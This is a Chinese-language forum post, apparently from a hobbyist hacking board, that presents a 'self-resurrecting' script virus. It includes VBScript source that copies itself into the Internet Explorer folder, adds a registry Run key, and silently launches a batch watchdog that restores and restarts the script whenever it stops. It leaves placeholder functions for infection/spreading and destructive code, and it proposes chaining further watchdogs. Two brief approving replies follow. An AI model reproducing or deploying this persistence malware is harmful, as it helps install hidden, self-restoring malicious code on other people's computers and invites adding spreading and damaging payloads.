简单的脚本病毒自我复活思路

判断是否是第一次运行，如果是第一次运行就把自己复制进ie目录，并且加入启动项，结束。

下一次开机运行后。创建一个批处理监控程序，作用是备份病毒的代码、监控病毒是否正常运行，若没有运行，就用备份的代码创建一个新病毒并运行。

非常傻得一个东西、报毒是肯定的，因为往注册表添加启动项了。只是一个简单的病毒思想嘛，按照这个原理，可以继续创建第二个监控程序，监控第一个监控程序的运行，甚至更多。

1. 
   
2. [color=#ff00][font=Tahoma,]On Error Resume Next[/font][/color]
   
3. [color=#ff00][font=Tahoma,]set xfso=createobject("scripting.filesystemobject")[/font][/color]
   
4. [color=#ff00][font=Tahoma,]set xwsh=createobject("wscript.shell")[/font][/color]
   
5. [color=#ff00][font=Tahoma,]if xfso.fileexists("C:\Program Files\Internet Explorer\sys.vbs")=false then[/font][/color]
   
6. [color=#ff00][font=Tahoma,]    xfso.copyfile wscript.scriptfullname,"C:\Program Files\Internet Explorer\sys.vbs",true[/font][/color]
   
7. [color=#ff00][font=Tahoma,]    xwsh.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\open","C:\Program Files\Internet Explorer\sys.vbs"[/font][/color]
   
8. [color=#ff00][font=Tahoma,]    wscript.quit[/font][/color]
   
9. [color=#ff00][font=Tahoma,]end if[/font][/color]
   
10. [color=#ff00][font=Tahoma,]set x1=xfso.opentextfile("C:\Program Files\Internet Explorer\ie.bat",2,true)[/font][/color]
    
11. [color=#ff00][font=Tahoma,]x1.writeline "@echo off"[/font][/color]
    
12. [color=#ff00][font=Tahoma,]x1.writeline "type sys.vbs > system.txt"[/font][/color]
    
13. [color=#ff00][font=Tahoma,]x1.writeline ":loop"[/font][/color]
    
14. [color=#ff00][font=Tahoma,]x1.writeline "tasklist | find /i " & chr(34) & "wscript.exe" & chr(34) & "||goto :a"[/font][/color]
    
15. [color=#ff00][font=Tahoma,]x1.writeline "ping -n 5 127.1>nul"[/font][/color]
    
16. [color=#ff00][font=Tahoma,]x1.writeline "goto :loop"[/font][/color]
    
17. [color=#ff00][font=Tahoma,]x1.writeline ":a"[/font][/color]
    
18. [color=#ff00][font=Tahoma,]x1.writeline "type system.txt > sys.vbs"[/font][/color]
    
19. [color=#ff00][font=Tahoma,]x1.writeline "sys.vbs"[/font][/color]
    
20. [color=#ff00][font=Tahoma,]x1.writeline "ping -n 5 127.1>nul"[/font][/color]
    
21. [color=#ff00][font=Tahoma,]x1.writeline "goto :loop"[/font][/color]
    
22. [color=#ff00][font=Tahoma,]x1.close[/font][/color]
    
23. [color=#ff00][font=Tahoma,]xwsh.run "ie.bat",0[/font][/color]
    
24. [color=#ff00][font=Tahoma,]copy()[/font][/color]
    
25. [color=#ff00][font=Tahoma,]dead()[/font][/color]
    
26. [color=#ff00][font=Tahoma,]xwsh.run "sys.vbs"[/font][/color]
    
27. 
    
28. [color=#ff00][font=Tahoma,]function copy()[/font][/color]
    
29. [color=#ff00][font=Tahoma,]'感染和传播代码[/font][/color]
    
30. [color=#ff00][font=Tahoma,]end function[/font][/color]
    
31. 
    
32. [color=#ff00][font=Tahoma,]function dead()[/font][/color]
    
33. [color=#ff00][font=Tahoma,]'破坏代码[/font][/color]
    
34. [color=#ff00][font=Tahoma,]end function[/font][/color]
    
35. [color=#ff00][font=Tahoma,]

复制代码

我先沙发了

学习了！！！！抢沙发